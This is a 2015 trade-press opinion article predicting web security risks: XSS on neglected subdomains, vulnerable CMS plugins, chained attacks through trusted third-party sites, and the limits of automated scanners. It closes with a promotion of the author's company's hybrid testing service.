Four cyber security risks not to be taken for granted in 2015
With Sony the latest victim of hacking, large organisations are witnessing yet again how data breaches cause serious damage, to the tune of millions. The prevalence of hacking in the media begs the question, what’s in store for 2015? writes Ilia Kolochenko
Against a background of more frequent and dangerous XSS attacks, third-party code and plugins remaining the Achilles’ Heel of web applications and growing chained attacks, organisations will be looking to new ways to protect their online properties.
Unfortunately, it’s pretty difficult to make information security predictions, and even more difficult to verify them afterwards – we can only judge the effectiveness of information security by the number of public security incidents, as the majority of data breaches remain undetected.
However, here we make some web security predictions based on common sense profitability (profit/cost ratio) for hackers:
1. XSS will become a more frequent and dangerous vector of attacks
It’s very difficult to detect high or critical risk vulnerabilities in well-known web products (e.g. Joomla, WordPress, SharePoint, etc). However, low and medium risk vulnerabilities, such as XSS, will still regularly appear. Sophisticated exploitation of an XSS can give the same outcomes as an SQL injection vulnerability, therefore hackers will rely on XSS attacks more and more to achieve their goals.
Indeed, XSS on subdomains puts the entire web application at risk. Many large companies install web application firewalls (WAF) and regularly conduct penetration testing for their main, most critical website. At the same time they ignore security of numerous subdomains that they consider “less important” for business continuity. The problem is that in many cases, for the sake of simplicity, usability and compatibility, cookies installed on the main website (e.g. www.site.com) will be valid for any subdomain like (education.site.com or jobs.site.com).
This means that an XSS vulnerability on a forgotten subdomain may be easily used to steal cookies from the main website, or from the other subdomains (e.g. e-banking.site.com that also sets cookies for *.site.com), even if they are located on completely different servers in different datacenters.
Quite often, particularly in large companies, different departments have their own websites and subdomains for testing reasons which are not designed to be secure, but their presence endangers the entire web infrastructure of the company. We are not even talking about the case when test area is located directly on the main website (e.g. www.site.com/secr3t/beta1/) but can be found by Google search.
2. Third-party code and plugins will remain the Achilles’ Heel of web applications
While the core code of well-known CMSs and other web products are fairly secure today, third-party code such as plugins or extensions remain vulnerable even to high-risk vulnerabilities. Web developers tend to forget that one outdated plugin or third-party website voting script endanger the entire web application. Obviously hackers will not miss such opportunities.
For example WordPress may not be vulnerable, but the WordPress plugins, which are often produced by new coders with little security experience, may be vulnerable. At the same time plugins are unavoidable as organisations will always want some specific customised features on their websites that no CMS can provide by default. Of course from time to time new vulnerabilities (or bypasses of previous patches) in major CMSs are announced, but they represent the vast minority and are usually quite complex to exploit.
A vulnerable plugin means a vulnerable CMS that has this plugin installed. By exploiting XSS and SQLi flaws in the plugins, the attacker can get at the admin password same as if he were exploiting these vulnerabilities in the core code of the web application.
3. Chained attacks via third-party websites will grow
Nowadays, it’s pretty difficult to find a critical vulnerability on a well-known website. It is much quicker, and thus cheaper, for hackers to find several medium risk vulnerabilities that in combination allow complete access to the website. Another trend is to attack a reputable website that the victim regularly visits. For example, when chasing for a C-level executive, hackers may compromise several high-profile financial websites or newspapers, and insert an exploit pack that will be activated only for a specific IP, user-agent and authentication cookie combination belonging to the victim. Such attacks are very complicated to detect, as only the victim can notice the attack.
4. Automated security tools and solutions will no longer be efficient
Web Application Firewalls, Web Vulnerability Scanners or Malware Detection services will not be efficient anymore if used independently or without human control. Both web vulnerabilities and web attacks are becoming more and more sophisticated and complex to detect, and human intervention is almost always necessary to fully detect all the vulnerabilities. It’s not enough to patch 90% or even 99% of the vulnerabilities – hackers will detect the last vulnerability and use it to compromise the entire website.
The need for human skills was recently demonstrated by a major new analysis (reported by Ars Technica) conducted by the universities of KU Leuven (Belgium) and Stony Brook (New York). The researchers tested websites “protected” with various trust seals provided by security vendors delivering automated vulnerability and malware scanning services – reputable companies including Symantec, McAfee, Trust-Guard, and Qualys. The research showed “that seal providers perform very poorly when it comes to the detection of vulnerabilities on the websites that they certify.” This is a weakness inherent in almost all fully-automated solutions – they can only go so far before their output needs to be analysed by a qualified pentester.
As a solution to the new threats High-Tech Bridge has launched ImmuniWeb SaaS – a unique hybrid that uses automated security assessment combined with manual penetration testing.